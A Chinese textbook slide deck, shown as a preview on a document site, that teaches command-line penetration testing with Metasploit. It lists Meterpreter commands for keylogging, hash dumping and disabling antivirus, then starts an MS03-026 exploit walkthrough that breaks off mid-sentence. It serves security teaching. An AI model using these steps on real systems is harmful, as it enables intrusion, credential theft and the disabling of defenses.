《计算机网络安全防护技术(第二版)》 课件 第6章 任务6.4.2 通过命令行界面对服务器实施渗透测试.pptx

《计算机网络安全防护技术(第二版)》 课件 第6章 任务6.4.2 通过命令行界面对服务器实施渗透测试.pptx

  1. 1、本文档共19页,可阅读全部内容。
  2. 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多

第6章

网络安全渗透测试技术;任务6.4.2通过命令行界面对服务器实施渗透测试;二、Metasploit框架结构MSF的操作步骤。

一)针对被攻击者主机的漏洞,选择用于发射恶意代码的发射器exploit。

1.search:查看可用的发射器exploits。

2.use:选用合适的发射器exploits。

二)选用攻击载荷payload(如木马等恶意代码),并设置相关参数。

1.showpayloads:查看所有可选的攻击载荷(恶意代码)。

2.setpayload:从大量的攻击载荷payloads中,选择一个,一般选用Meterpreter作为攻击载荷。

3.showoptions:查看攻击载荷的配置选项。

4.set:设置攻击载荷的配置选项、设置相关参数。;三)查看适用的操作系统

1.showtargets:查看所选的发射器和攻击载荷适用的操作系统及版本,如果与被攻击者的不符,则无法实施攻击。

2.settarget设置攻击的操作系统。

四)实施攻击

exploit:使用选好的发射器exploit和攻击载荷payload,执行渗透测试攻击,效果和run一样。参数–j表示攻击在后台进行。

以上是完整的步骤,根据实际情况,操作中可以省去其中某些步骤。;三、攻击载荷Meterpreter常用命令

Meterpreter是最常用的攻击载荷,其常用的命令如下:

1.background回到后台,即上一个命令提示符。

2.sessions每个攻击为一个会话,每个会话有一个唯一的ID,使用sessions命令可查看当前有哪些会话,即有哪些主机被控制了。

使用session-h命令可查看帮助信息。使用sessionsID命令可切换到指定的session会话。

使用session-kID命令可关闭指定的session会话。

3.screenshot对被攻击主机截屏,保存到本地。

4.sysinfo显示被攻击主机的系统信息。

5.ps查看被攻击主机正在运行的进程。

6.migrate将meterpreter迁移到相对稳定的进程中。

7.runkeylogrecorder键盘记录

8.runhashdump收集被攻击者主机的密码哈希值

9.runvnc打开被攻击者主机的桌面

10.runkillav关闭被攻击者主机的杀毒软件。;四、对Windows服务器实施MS03-026漏洞攻击

上一小节,我们通过Nessus扫描到了Windows服务器存在MS03-026漏洞。下面学习如何针对该已知漏洞,用命令行界面对目标系统实施渗透测试攻击。

1.打开命令行界面,输入msfconsole命令。

root@kali:~/Downloads#msfconsole

2.输入searchms03-026命令,查找针对漏洞ms03-026的exploit发射器。

msfsearchms03-026

[!]Moduledatabasecachenotbuiltyet,usingslowsearch

MatchingModules

================

NameDisclosureDateRankDescription

-----------------------------------

exploit/windows/dcerpc/ms03_026_dcom2003-07-16greatMS03-026MicrosoftRPCDCOMInterfaceOverflow

查找到针对该漏洞的发射器:exploit/windows/dcerpc/ms03_026_dcom

3.通过useexploit/windows/dcerpc/ms03_026_dcom命令,选用该exploit发射器。

msfuseexploit/windows/dcerpc/ms03_026_dcom;4.通过showpayloads命令,查看所有可选的攻击载荷payload(恶意代码)。

msfexploit(windows/dcerpc/ms03_026_dcom)showpayloads;可以看到,可用的payload攻击载荷很多。其中,windows/meterpreter/bind_tcp是kali主动联系被攻击者,如果要经过防火墙,易被过滤掉,不容易成功;我们将采用windows/meterpreter/reverse_tcp,

您可能关注的文档

文档评论(0)

xiaobao + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档